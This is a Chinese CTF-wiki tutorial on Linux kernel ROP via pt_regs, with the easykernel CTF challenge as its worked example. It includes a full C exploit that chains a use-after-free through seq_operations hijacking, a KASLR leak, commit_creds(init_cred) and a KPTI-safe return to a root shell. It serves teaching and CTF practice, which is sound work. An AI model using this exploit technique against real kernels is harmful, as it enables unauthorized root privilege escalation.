利用 pt_regs 构造通用内核 ROP¶

系统调用与 pt_regs 结构体¶

系统调用的本质是什么？或许不少人都能够答得上来是由我们在用户态布置好相应的参数后执行 syscall 这一汇编指令，通过门结构进入到内核中的 entry_SYSCALL_64这一函数，随后通过系统调用表跳转到对应的函数。

现在让我们将目光放到 entry_SYSCALL_64 这一用汇编写的函数内部，注意到当程序进入到内核态时，该函数会将所有的寄存器压入内核栈上，形成一个 pt_regs 结构体，该结构体实质上位于内核栈底，定义如下：

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

内核栈与通用 ROP¶

我们都知道，内核栈只有一个页面的大小，而 pt_regs 结构体则固定位于内核栈栈底，当我们劫持内核结构体中的某个函数指针时（例如 seq_operations->start），在我们通过该函数指针劫持内核执行流时 rsp 与栈底的相对偏移通常是不变的。

而在系统调用当中过程有很多的寄存器其实是不一定能用上的，比如 r8 ~ r15，这些寄存器为我们布置 ROP 链提供了可能，我们不难想到：

只需要寻找到一条形如 "add rsp, val ; ret" 的 gadget 便能够完成 ROP

这里笔者给出一个通用的 ROP 板子，方便调试时观察：

asm volatile(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0x88888888;"
    "mov r8,    0x99999999;"
    "xor rax,   rax;"
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   8;"
    "mov rsi,   rsp;"
    "mov rdi,   seq_fd;"  // 这里假定通过 seq_operations->stat 来触发
    "syscall"
);

新版本内核对抗利用 pt_regs 进行攻击的办法¶

正所谓魔高一尺道高一丈，内核主线在这个 commit 中为系统调用栈添加了一个偏移值，这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值：

diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
 #ifdef CONFIG_X86_64
 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
 {
+    add_random_kstack_offset();
     nr = syscall_enter_from_user_mode(regs, nr);

     instrumentation_begin();

当然，若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下，仍然可以通过布置一些 slide gadget 来继续完成利用，不过稳定性也大幅下降了。

例题：西湖论剑2021线上初赛 - easykernel¶

题目附件可在 https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/XHLJ2021-easykernel 下载。

分析¶

首先查看启动脚本，可以发现开启了 SMEP 和 KASLR：

#!/bin/sh

qemu-system-x86_64  \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"

进入题目环境，查看 /sys/devices/system/cpu/vulnerabilities/*，可以发现开启了 PTI （页表隔离）：

/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected

题目给了个 test.ko，拖入 IDA 进行分析，发现只定义了 ioctl，可以看出是常见的“菜单堆”题目，给出了分配、释放、读、写 object 的功能。对于分配 object，我们需要传入如下形式结构体：

struct
{
    size_t size;
    void *buf;
}

对于释放、读、写 object，则需要传入如下形式结构体：

struct 
{
    size_t idx;
    size_t size;
    void *buf;
};

分配：0x20¶

比较常规的 kmalloc，没有限制size，最多可以分配 0x20 个 chunk：

 v7 = _kmalloc(v12, 3264LL);
  v8 = v7;
  if ( !v7 )
    return 0LL;
  v9 = v12;
  v10 = v13;
  if ( v12 > 0x7FFFFFFF )
    goto LABEL_29;
  _check_object_size(v7, v12, 0LL);
  v11 = copy_from_user(v8, v10, v9);
  if ( v11 )
    return 0LL;
  while ( addrList[v11] )
  {
    if ( ++v11 == 32 )
      return 0LL;
  }
  addrList[(int)v11] = v8;
  return 0LL;
}

释放：0x30¶

kfree 以后没有清空指针，直接就有一个裸的 UAF 糊脸：

  if ( a2 != 32 )
  {
    if ( a2 != 48 )
      return result;
    if ( !copy_from_user(&v12, v2, 8LL) )
    {
      if ( (unsigned int)v12 <= 0x20 )
      {
        if ( addrList[(unsigned int)v12] )
          kfree();
      }
      return 0LL;
    }
    return -22LL;
  }

读：0x40¶

会调用 show 函数：

  if ( a2 == 64 )
  {
    if ( !copy_from_user(&v12, v2, 24LL) )
    {
      show(&v12);
      return 0LL;
    }
    return -22LL;
  }

其实就是套了一层皮的读 object 内容，加了 hardened usercopy 检查：

__int64 __fastcall show(_QWORD *a1)
{
  const void *v1; // rsi
  unsigned __int64 v2; // r13
  __int64 v3; // r14
  _QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF

  _fentry__();
  v5[32] = __readgsqword(0x28u);
  v5[0] = 0LL;
  memset(&v5[1], 0, 0xF8uLL);
  if ( (unsigned int)*a1 > 0x20 )
    return 0xFFFFFFFFLL;
  v1 = (const void *)addrList[(unsigned int)*a1];
  if ( !v1 )
    return 0xFFFFFFFFLL;
  v2 = a1[1];
  v3 = a1[2];
  qmemcpy(v5, v1, 0x100uLL);
  if ( v2 > 0x100 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
    BUG();
  }
  _check_object_size(v5, v2, 1LL);
  return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}

写：0x50¶

常规的写入 object：

  if ( a2 > 0x40 )
  {
    if ( a2 == 80 )
    {
      if ( copy_from_user(&v12, v2, 24LL) )
        return -22LL;
      if ( (unsigned int)v12 <= 0x20 )
      {
        v4 = addrList[(unsigned int)v12];
        if ( v4 )
        {
          v5 = v13;
          v6 = v14;
          if ( v13 <= 0x7FFFFFFF )
          {
            _check_object_size(addrList[(unsigned int)v12], v13, 0LL);
            copy_from_user(v4, v6, v5);
            return 0LL;
          }
LABEL_29:
          BUG();
        }
      }
    }
    return 0LL;
  }

解法：UAF + seq_operations + pt_regs + ROP¶

既然我们有一个直接的大小不限的 UAF 漏洞，那么解法就是多种多样的了。我们首先考虑如何劫持内核执行流，我们不难想到的是各种动态分配的函数表，例如 seq_operations 这个结构体便从 kmalloc-32 中动态分配：

当我们打开一个 stat 文件时（如 /proc/self/stat ）便会在内核空间中分配一个 seq_operations 结构体，该结构体定义于 /include/linux/seq_file.h 当中，只定义了四个函数指针，如下：

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

当我们 read 一个 stat 文件时，内核会调用其 proc_ops 的 proc_read_iter 指针，其默认值为 seq_read_iter() 函数，定义于 fs/seq_file.c 中，注意到有如下逻辑：

ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    struct seq_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

即其会调用 seq_operations 中的 start 函数指针，那么我们只需要控制 seq_operations->start 后再读取对应 stat 文件便能控制内核执行流 。

控制了内核执行流之后，我们来看如何进一步进行提权，不难想到的是我们可以在 pt_regs 上布置 ROP chain，之后直接使用形如 add rsp; ret 的 gadget 便能完成 ROP。需要注意的是 KPTI 是开启的，因此我们最后需要使用 swapgs_restore_regs_and_return_to_usermode 函数返回用户态。

最终的 exp 如下：

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/ioctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t commit_creds;
size_t gadget;

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

/**
 * Challenge Interface
**/

struct chal_karg_type1 {
    size_t  idx;
    size_t  size;
    void    *buf;
};

struct chal_karg_type2 {
    size_t  size;
    void    *buf;
};

void alloc_chunk(long dev_fd, size_t size, void *buf)
{
    struct chal_karg_type2 arg = {
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x20, &arg);
}

void delete_chunk(long dev_fd, size_t idx)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
    };
    ioctl(dev_fd, 0x30, &arg);
}

void read_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x40, &arg);
}

void write_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x50, &arg);
}

/**
 * Exploitation
**/

#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30

size_t buf[0x100];
int seq_fd;

void exploitation(void)
{
    int dev_fd;

    dev_fd = open("/dev/kerpwn", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/rwctf file!");
    }

    puts(INFO_MSG("[*] Allocating object and UAF as seq_operations..."));
    alloc_chunk(dev_fd, 0x20, buf);
    delete_chunk(dev_fd, 0);
    seq_fd = open("/proc/self/stat", O_RDONLY);
    read_chunk(dev_fd, 0, 0x20, buf);

    kernel_offset = buf[0] - SEQ_OPS_0;
    kernel_base += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    gadget = 0xffffffff8135b0f6 + kernel_offset;

    printf(
        SUCCESS_MSG("[+] Got kernel base: ") "%lx"
        SUCCESS_MSG(" , kaslr offset: ") "%lx\n",
        kernel_base,
        kernel_offset
    );

    buf[0] = gadget; // seq_operations->stat
    swapgs_restore_regs_and_return_to_usermode += 9;
    write_chunk(dev_fd, 0, 0x20, buf);

    puts(INFO_MSG("[*] Triggering evil seq_operations..."));

    asm volatile(
        "mov r15, 0xbeefdead;" // ROP
        "mov r14, pop_rdi_ret;"
        "mov r13, init_cred;" // add rsp, 0x40 ; ret
        "mov r12, commit_creds;"
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;" // iret(q)
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;"
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov rdi, seq_fd;"
        "syscall"
    );

    get_root_shell();
}

int main(int argc, char ** argv, char ** envp)
{
    exploitation();
    return 0;
}

Reference¶

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

https://arttnba3.cn/2021/11/29/PWN-0X02-LINUX-KERNEL-PWN-PART-II/